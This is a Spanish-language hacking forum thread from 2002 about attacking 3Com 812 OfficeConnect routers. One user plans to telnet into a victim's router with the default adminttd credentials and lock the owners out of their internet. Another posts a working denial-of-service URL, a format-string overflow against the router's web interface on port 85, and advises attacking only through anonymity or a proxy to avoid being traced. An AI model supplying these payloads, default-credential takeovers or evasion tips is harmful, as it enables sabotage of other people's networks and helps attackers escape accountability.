PDA

Ver la versión completa : HaCk 3CoM 812 Office Connect



Kender
19-08-2002, 23:34
Veamos, estaba yo pensando tan feliz en mi kely una teoria [espero k me aiudeis a aklararme las ideas sobre ella]

Seria posible, Hackear remotamente un routter 3Com 812 Office Connect, sabiendo su ip publica [la del router], y en konfiguracion MONOPUESTO [es decir, los toos los puertos mappeados]??...estuve pensando en hacer un telnet a ese routter, i borrar la kuenta xr defekto [adminttd / adminttd] i krear la mia propia [todo esto remotamente]
Kambiando la konfiguracion xra k el router no funcionara, i ellos sin poder konfigurarlo [al no tener la ya kuenta], starian sin inet..
kreeis k seria eso posible?

asias de antemano xr intentar aklararme el concepto;)
Cyu aLL ^^

eXcalibur
20-08-2002, 12:58
Ahora que hablas de este modem, hay una vulnerabilidad que he probado personalmente y funciona. Se trata de un ataque DOS (Denial Of Services).
Es facil de provocar, solo hay que poner en el browser http://ipdelavictima:85/graphics/sml3com
conjuntamente a una cadena que provoque overflow, la cosa quedaría así:
http://ipdelavictima:85/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%20%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s% s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s




NO LO HAGAIS SI NO NAVEGAIS DE FORMA ANÓNIMA , juro que os pillarán la IP


PD: no se aprecian todos los "%s" que he puesto por culpa de las restricciones del foro, así que pones encima del link para vero mejor

THE_CROW
20-08-2002, 15:01
lo de juro que os pilllarán la ip...
A ver si mi ignorancia me delata pero... El 3com no guarda un log de conexiones:p y... No creo que a alguien que se le cuelgue el router piense... ME HAN HECHO UN D.O.S!!! y coja y lo denuncie.

Aún así es muy facil poner un proxy por medio y no arriesgarse.

TseTse
20-08-2002, 15:45
El 3com creo que guarda un NAPT MAP al igual que el ss, por lo que no es especificamente un *log*.

TseTse

THE_CROW
20-08-2002, 16:55
jejeje.......... y que coño es un NAPT MAP???:confused: Ilustrame maestro:D :D

TseTse
20-08-2002, 19:10
Concretamente esto:
http://usuarios.lycos.es/tsetse2/naptmap.gif

Quedan las conexiones, protocolo IP de destino, puerto local, etc...

TseTse

eXcalibur
20-08-2002, 21:34
Y aunque no sea el 3com, pueden tener auditado absulatamente TODO lo que venga desde fuera.

Kender
20-08-2002, 22:07
te xplico el problema k tengo kn lo del proxy.

Resulta k io tengo tb el 3com, i lo tengo direkto al hub, es decir, kn ip privada propia [la misma k el gateway]
es decir, k tenemos kmo 7 ordenatas pal hub, i toos kn inet;)
ahora mi pregunta es:
Kmo konfigurarme un wen proxy, teniendo la config k tengo?:confused:

Asias de antemano ^^

Kender

THE_CROW
21-08-2002, 02:43
joder cada dia me gustan más las fotos explicativas de TseTse. Gracias a los dos por la información:p

CrAcKzMe
22-08-2002, 10:14
jajaja, dios, esto de los 3com... cuanto hace que le doy vueltas. Si hay un exploit algo mas complejo que el de excalibur (un saludo tio) y unas claves mas complejas que adminttd:: Trabajo de un amigo mio de aqui del foro, y el me conto una de las maneras mas faciles y que practicamente nadie conoce, que no esta erradicada, desde aqui le mando un saludo, y que te mejores, en serio.
PORSUPUESTO que te logean la IP, cualquier admin medianamente mediocre pondria un sispositivo de logeo.
Salu2

THE_CROW
22-08-2002, 10:38
seguro????;) Porque hay cada admin.....(no quitan ni la cuenta adminttd)

CrAcKzMe
22-08-2002, 10:40
jajaj, si de cabezones y desagradecidos esta el mundo lleno xDDDD
Salu2